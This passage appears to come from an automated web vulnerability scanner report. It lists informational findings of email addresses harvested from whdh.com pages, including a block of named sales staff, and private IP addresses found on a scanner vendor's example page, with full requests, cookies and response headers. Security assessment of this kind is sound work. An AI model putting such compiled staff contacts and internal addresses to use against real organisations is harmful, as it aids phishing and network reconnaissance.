Expires: Mon, 24 Jan 2011 22:06:35 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close
Content-Length: 2095


<div class='ui-helper-clearfix' style='padding:10px;background:#f0f0f0;border-bottom:1px solid #cfcfcf;'>
<h4 style='margin-bottom:7px;'>Have a story idea or news tip for 7NEWS?</h4><p>Email: <a href="mailto:newstips@whdh.com">newstips@whdh.com</a>
...[SNIP]...

24.475. http://www1.whdh.com/includes/elements/accordion_whdh-viewervoices

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /includes/elements/accordion_whdh-viewervoices

Issue detail

The following email address was disclosed in the response:
  • viewervoices@whdh.com

Request

GET /includes/elements/accordion_whdh-viewervoices HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:53:58 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-viewervoices.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=3600
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:53:08 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Content-Length: 2006

<div class='accordion-vv'><div class='accordion-vv-top'><h4>We want to hear from you</h4><img src='http://www1.whdh.com/images/news_articles/116x65/110121_braintree_snow.jpg' /><p><a href="http://www1
...[SNIP]...
<a href="mailto:viewervoices@whdh.com">
...[SNIP]...

24.476. http://www1.whdh.com/jobs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /jobs/

Issue detail

The following email address was disclosed in the response:
  • human_resources@whdh.com

Request

GET /jobs/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:05 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2718
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:42:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14859
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Job Postings</title>
<meta name="publisher" content="New England
...[SNIP]...
<a href="mailto:human_resources@whdh.com">human_resources@whdh.com</a>
...[SNIP]...

24.477. http://www1.whdh.com/jobs/internships

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /jobs/internships

Issue detail

The following email addresses were disclosed in the response:
  • SMacEachern@whdh.com
  • human_resources@whdh.com
  • khenry@whdh.com
  • klam@whdh.com

Request

GET /jobs/internships HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:15 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: internships.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=86400
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 21:56:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close
Content-Length: 14434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Internship Opportunities</title>
<meta name="publisher" content=
...[SNIP]...
ecialized segments of news such as political, medical or consumer stories. Provide clerical assistance and research support. Occasional field production assistance. Email cover letter and resume to khenry@whdh.com outlining your interests and availability. SPRING SEMESTER 2011 IS FULL! NO MORE APPLICATIONS ARE BEING ACCEPTED AT THIS TIME. APPLY MID- APRIL FOR A SUMMER INTERNSHIP. THANK YOU.<br />
...[SNIP]...
upport as needed. Intern in the heart of the news operation days, evenings and/or weekends. Email your resume and a cover letter giving approximate availability (days and hours) to Scott MacEachern, SMacEachern@whdh.com along with why you are a good candidate for our program. <br />
...[SNIP]...
nclude checking major sports websites for breaking news, logging game tapes, answering phones, etc. Opportunities to accompany crews in the field may exist. Send cover letter and resume to Sports at klam@whdh.com with why you would be an asset to the sports team in the coming semester. Sports interns log games, research stories, assist with details for upcoming sportscasts and assist with basic clerical suppo
...[SNIP]...
<a href="mailto:human_resources@whdh.com">human_resources@whdh.com</a>
...[SNIP]...

24.478. http://www1.whdh.com/js/jq/jquery.hoverIntent-r5.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /js/jq/jquery.hoverIntent-r5.min.js

Issue detail

The following email address was disclosed in the response:
  • brian@cherne.net

Request

GET /js/jq/jquery.hoverIntent-r5.min.js HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 04:52:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Type: application/x-javascript
Last-Modified: Mon, 17 Aug 2009 12:57:34 GMT
ETag: "1ec21d-647-f20deb80"
Accept-Ranges: bytes
Age: 61306
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 04:52:52 GMT
Cache-Control: max-age=604800
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 1607

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.479. http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

Issue detail

The following email address was disclosed in the response:
  • newstips@whdh.com

Request

GET /news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=33445
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:12:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21272
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Quincy school evacuated due to odor and pipe burst</title>
<meta name="pub
...[SNIP]...
<a href="mailto:newstips@whdh.com"><em>newstips@whdh.com</em>
...[SNIP]...

24.480. http://www1.whdh.com/privacypolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /privacypolicy

Issue detail

The following email address was disclosed in the response:
  • webmaster@whdh.com

Request

GET /privacypolicy HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: privacypolicy.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 19843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Privacy Policy</title>
<meta name="publisher" content="New Engla
...[SNIP]...
<a href="mailto:webmaster@whdh.com">webmaster@whdh.com</a>
...[SNIP]...
essage. Simply click on this link to go to a page that allows you to unsubscribe from any or all of the lists you are subscribed to. In addition to using the unsubscribe page, you can send an email to webmaster@whdh.com or write to us at WHDH-TV, 7 Bulfinch Place, Boston, MA 02215, ATT: WHDH.com webmaster.
</p>
...[SNIP]...
<br />
webmaster@whdh.com
</p>
...[SNIP]...

24.481. http://www1.whdh.com/sales/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /sales/

Issue detail

The following email addresses were disclosed in the response:
  • cshiebler@whdh.com
  • ddelvecchioy@whdh.com
  • eclark@whdh.com
  • jhowe@whdh.com
  • lhoey@whdh.com
  • lmattson@whdh.com
  • lryan@whdh.com
  • mburt@whdh.com
  • pbertoli@whdh.com
  • pcommane@whdh.com
  • pmagnes@whdh.com
  • pmarkham@whdh.com
  • rburns@whdh.com
  • rkramer@whdh.com

Request

GET /sales/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:03 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=3430
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:54:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9850
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Sales</title>
<meta name="publisher" content="New England News S
...[SNIP]...
<a href="mailto:rburns@whdh.com">
...[SNIP]...
<a href="mailto:pmagnes@whdh.com">
...[SNIP]...
<a href="mailto:mburt@whdh.com">
...[SNIP]...
<a href="mailto:rkramer@whdh.com">
...[SNIP]...
<a href="mailto:lmattson@whdh.com">
...[SNIP]...
<a href="mailto:pmarkham@whdh.com">
...[SNIP]...
<a href="mailto:pbertoli@whdh.com">
...[SNIP]...
<a href="mailto:eclark@whdh.com">
...[SNIP]...
<a href="mailto:pcommane@whdh.com">
...[SNIP]...
<a href="mailto:ddelvecchioy@whdh.com">
...[SNIP]...
<a href="mailto:lhoey@whdh.com">
...[SNIP]...
<a href="mailto:jhowe@whdh.com">
...[SNIP]...
<a href="mailto:lryan@whdh.com">
...[SNIP]...
<a href="mailto:cshiebler@whdh.com">
...[SNIP]...

24.482. http://www1.whdh.com/slideshows/view/BitterBlastTemperatures

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/BitterBlastTemperatures

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /slideshows/view/BitterBlastTemperatures HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21954
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Bitter Blast Temperatures</title>
<meta name="publisher" content="New
...[SNIP]...
<p>Send your Bitter Blast Temperatures pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.483. http://www1.whdh.com/slideshows/view/FunintheSnow

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/FunintheSnow

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /slideshows/view/FunintheSnow HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23022
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Fun in the Snow</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<p>Send your Fun in the Snow pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.484. http://www1.whdh.com/slideshows/view/January12thStormPets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January12thStormPets

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /slideshows/view/January12thStormPets HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:49 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 94
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:55:49 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:55:49 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 22779
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Winter Weather - Snowy Pets</title>
<meta name="publisher" content="Ne
...[SNIP]...
<p>Send your Winter Weather - Snowy Pets pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.485. http://www1.whdh.com/slideshows/view/January12thTreesDown

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January12thTreesDown

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /slideshows/view/January12thTreesDown HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23062
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 12th Trees Down</title>
<meta name="publisher" content="New En
...[SNIP]...
<p>Send your January 12th Trees Down pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.486. http://www1.whdh.com/slideshows/view/January18WinterStorm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January18WinterStorm

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /slideshows/view/January18WinterStorm HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:25 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:25 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23072
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 18 Snow/Ice Storm</title>
<meta name="publisher" content="New
...[SNIP]...
<p>Send your January 18 Snow/Ice Storm pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.487. http://www1.whdh.com/slideshows/view/January21SnowStorm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January21SnowStorm

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /slideshows/view/January21SnowStorm HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21934
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 21 Snow Storm</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<p>Send your January 21 Snow Storm pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.488. http://www3.whdh.com/mobile/phoneforecast/settings.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.whdh.com
Path:   /mobile/phoneforecast/settings.php

Issue detail

The following email address was disclosed in the response:
  • webmaster@whdh.com

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
Expires: Wed, 26 Jan 2011 00:10:25 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...
<p style="color:#CD1900;">If you have any questions or concerns feel free to email us at webmaster@whdh.com</p>
...[SNIP]...

24.489. http://xpn.altervista.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xpn.altervista.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • nemesis2001@gmx.it

Request

GET / HTTP/1.1
Host: xpn.altervista.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache
Last-Modified: Sun, 01 Feb 2009 11:57:51 GMT
ETag: "4a1f0-14ff-461da25c0cdc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5375
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<a href="MAILTO:nemesis2001@gmx.it">nemesis2001@gmx.it
<img src="images/mail_generic.png" width="32" height="32" alt="mail" />
...[SNIP]...

25. Private IP addresses disclosed
There are 12 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


25.1. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.cloudscan.us
Path:   /examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:
  • 10.2.129.225
  • 10.2.130.111
  • 10.2.130.26

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 25 Jan 2011 00:57:12 GMT
Accept-Ranges: bytes
ETag: "ac6a35cd2abccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 00:57:16 GMT
Content-Length: 1525922

<html><head><title>SQL Injection, DORK, XSS, XPath Injection, CWE-79, CWE-89</title>
   <meta name="description" content="XSS, Cross Site Scripting, XPath Injection, SQL Injection, DORK, CWE-79, CAPEC-8
...[SNIP]...
<br>X-Digg-Time: D=254963 10.2.130.26<br>
...[SNIP]...
<br>X-Digg-Time: D=28518 10.2.129.225<br>
...[SNIP]...
<br>X-Digg-Time: D=28518 10.2.129.225<br>
...[SNIP]...
<br>X-Digg-Time: D=28518 10.2.129.225<br>
...[SNIP]...
<br>X-Digg-Time: D=24007 10.2.130.111<br>
...[SNIP]...
